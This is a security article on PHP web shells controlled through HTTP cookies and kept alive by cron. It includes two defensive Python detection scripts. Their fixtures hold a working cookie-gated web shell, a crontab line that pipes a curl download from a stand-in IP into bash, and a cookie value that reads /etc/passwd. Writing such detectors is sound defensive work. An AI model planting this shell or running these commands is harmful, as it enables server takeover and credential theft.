Threat actors have been observed using HTTP cookies as the control channel for PHP-based web shells on Linux servers, giving them remote code execution on the compromised host.
The technique, documented by the Microsoft Defender Security Research Team, gates execution on attacker-supplied cookie values rather than on URL parameters or request bodies, the channels most web shells (and most detection rules) rely on.
Moving the control channel into cookies matters because cookies are a poorly monitored part of the request: the default Apache and nginx "combined" log formats record the request line, referrer and user agent but not the Cookie header, and request-inspection rules tend to concentrate on the query string and body. A cookie-driven shell therefore leaves little trace in the access log and is easy to overlook on a server that is already compromised.
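An added example, not code from the article or from Microsoft's research, showing what the cookie-gated pattern looks like in PHP source and a small scanner that finds it. The sample shell and the benign sample are constructed to illustrate the shape described above; the sink list, regexes and the name-based taint tracking are this example's own heuristics and will miss heavily obfuscated shells (string concatenation, variable-variables, `$GLOBALS` indirection).

```python
import os
import re

# Constructed sample: a minimal cookie-gated PHP web shell in the shape the
# article describes (assumed, not the sample Microsoft analysed).
SAMPLE_SHELL = r'''<?php
if (!isset($_COOKIE["session_tok"]) || $_COOKIE["session_tok"] !== "k3y") { die(); }
$cmd = $_COOKIE["c"];
echo shell_exec($cmd);
eval(base64_decode($_COOKIE["p"]));
'''

# Constructed benign code: reads a cookie but never executes it.
SAMPLE_BENIGN = r'''<?php
$lang = $_COOKIE["lang"] ?? "en";
echo htmlspecialchars($lang);
'''

# Code/command execution sinks a cookie value must never reach.
SINKS = ("eval", "assert", "system", "exec", "shell_exec", "passthru",
         "popen", "proc_open", "create_function")
# A cookie compared against a string literal: the "gate" the article describes.
GATE_RE = re.compile(r'\$_COOKIE\s*\[[^\]]*\]\s*(===?|!==?)\s*[\'"]')
# "$var = ... $_COOKIE[...]" taints $var for the rest of the file.
ASSIGN_RE = re.compile(r'(\$\w+)\s*=\s*[^;]*\$_COOKIE\s*\[')
SINK_RE = re.compile(r'\b(' + "|".join(SINKS) + r')\s*\(([^;]*)\)')


def find_cookie_sinks(php_src):
    """Return (line_no, kind, detail) for cookie-literal gates and for sinks
    reached by a $_COOKIE value. Taint tracking is per file and name based
    only (no control flow), which is enough for typical one-file web shells
    and cheap to run across a whole webroot."""
    tainted = set()
    findings = []
    for n, line in enumerate(php_src.splitlines(), 1):
        if GATE_RE.search(line):
            findings.append((n, "gate", "execution gated on a cookie literal"))
        for m in ASSIGN_RE.finditer(line):
            tainted.add(m.group(1))
        for m in SINK_RE.finditer(line):
            sink, arg = m.group(1), m.group(2)
            if "$_COOKIE" in arg:
                findings.append((n, sink, "direct $_COOKIE argument"))
                continue
            for var in sorted(tainted):
                if re.search(re.escape(var) + r'\b', arg):
                    findings.append((n, sink, "tainted variable " + var))
                    break
    return findings


def scan_webroot(root):
    """Walk a directory; return {path: findings} for every PHP file that has any."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".php", ".phtml", ".php5")):
                path = os.path.join(dirpath, fn)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        hits = find_cookie_sinks(fh.read())
                except OSError:
                    continue
                if hits:
                    results[path] = hits
    return results


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, hits in scan_webroot(sys.argv[1]).items():
            for n, kind, detail in hits:
                print(f"{path}:{n}: {kind}: {detail}")
    else:
        print("shell  ->", find_cookie_sinks(SAMPLE_SHELL))
        print("benign ->", find_cookie_sinks(SAMPLE_BENIGN))
```

Run it with a webroot path (for example `python3 scan.py /var/www`) to list every file and line where a cookie literal gates execution or a cookie value reaches a sink; without arguments it runs against the two constructed samples. Treat a "gate" hit in a file the application's developers do not recognise as a strong signal on its own.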
Persistence comes from a separate mechanism: the shells are also anchored by cron jobs on the Linux host, so they survive a reboot, and cleanup that removes the PHP file from the webroot but leaves the crontab untouched does not evict the attacker.
Microsoft's findings make the case for logging and monitoring the Cookie header (for example by extending the web server's log format) so that cookie-driven control traffic becomes visible, and for including crontabs in any compromise assessment of a Linux web server.
They are also a reminder that these shells are a post-exploitation tool: keeping the PHP runtime, the web applications and the underlying Linux host patched against known CVEs removes the initial-access paths the shells depend on.
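An added triage example, not code from the article or from Microsoft, covering the two detection points just raised: suspicious cron entries of the kind used to keep a web shell alive, and cookie values in web-server logs that look like commands or encoded payloads. The crontab and log lines are constructed; the log format assumes Apache's combined format extended with a trailing `"%{Cookie}i"` field (nginx users would add `"$http_cookie"`), and the regex rules are this example's own heuristics, not a published signature set.

```python
import base64
import re

# Constructed crontab (not from the article's incident): two benign jobs and
# two of the shape used to re-create or re-launch a shell after a reboot.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/bin/php -r 'eval(base64_decode("ZWNobyBoaQ=="));'
@reboot curl -s http://198.51.100.7/s.txt | bash
30 2 * * * /usr/local/bin/backup.sh
"""

# Constructed Apache access-log lines. The combined format does not record
# cookies; these assume a LogFormat that appends "%{Cookie}i" as a final field.
ACCESS_LOG = """\
203.0.113.5 - - [12/Mar/2025:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" "PHPSESSID=9f1c2e; lang=en"
203.0.113.9 - - [12/Mar/2025:10:01:07 +0000] "GET /images/cache.php HTTP/1.1" 200 71 "-" "Mozilla/5.0" "session_tok=k3y; p=ZWNobyBoaQ=="
203.0.113.9 - - [12/Mar/2025:10:01:09 +0000] "POST /images/cache.php HTTP/1.1" 200 1287 "-" "Mozilla/5.0" "session_tok=k3y; c=cat /etc/passwd | base64"
"""

# Heuristic cron rules (this example's own, not a published signature set).
CRON_RULES = [
    (re.compile(r'\b(php|python[23]?|perl|ruby)\b.*\s-[rec]\s'), "interpreter given inline code"),
    (re.compile(r'\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b'), "download piped into a shell"),
    (re.compile(r'base64\s+(-d|--decode)|base64_decode'), "base64-decoded payload"),
    (re.compile(r'(/tmp|/dev/shm|/var/www)/'), "touches a world-writable or web directory"),
]


def find_suspicious_cron(text):
    """Return (line_no, reasons) for crontab lines matching any CRON_RULES entry."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = [why for rx, why in CRON_RULES if rx.search(line)]
        if reasons:
            hits.append((n, reasons))
    return hits


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$')
SHELL_META = re.compile(r'[;|`]|\$\(|&&|/etc/|/tmp/|/dev/shm')
B64 = re.compile(r'^[A-Za-z0-9+/]{8,}={0,2}$')


def cookie_reasons(value):
    """Heuristics for one cookie value that looks like a command or a payload."""
    reasons = []
    if SHELL_META.search(value):
        reasons.append("shell metacharacters or sensitive path")
    if B64.match(value):
        try:
            decoded = base64.b64decode(value, validate=True).decode("ascii")
            if decoded.isprintable():
                reasons.append("base64 decodes to text: %r" % decoded)
        except (ValueError, UnicodeDecodeError):
            pass  # random session tokens rarely decode to printable ASCII
    if len(value) > 256:
        reasons.append("oversized value")
    return reasons


def flag_cookie_lines(text):
    """Return (line_no, ip, path, {cookie_name: reasons}) for log lines whose
    Cookie header carries at least one suspicious value."""
    flagged = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = {}
        for part in m.group("cookie").split(";"):
            name, _, value = part.strip().partition("=")
            reasons = cookie_reasons(value)
            if reasons:
                bad[name] = reasons
        if bad:
            flagged.append((n, m.group("ip"), m.group("path"), bad))
    return flagged


if __name__ == "__main__":
    for hit in find_suspicious_cron(CRONTAB):
        print("cron line %d: %s" % hit)
    for hit in flag_cookie_lines(ACCESS_LOG):
        print("log line %d from %s on %s: %s" % hit)
```

On a real host, feed `find_suspicious_cron` the output of `crontab -l` for every user plus the files under `/etc/cron.d`, and feed `flag_cookie_lines` logs written with the extended format; the base64 rule in particular will flag the encoded-payload cookie while leaving ordinary session identifiers alone, because those almost never decode to printable text.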
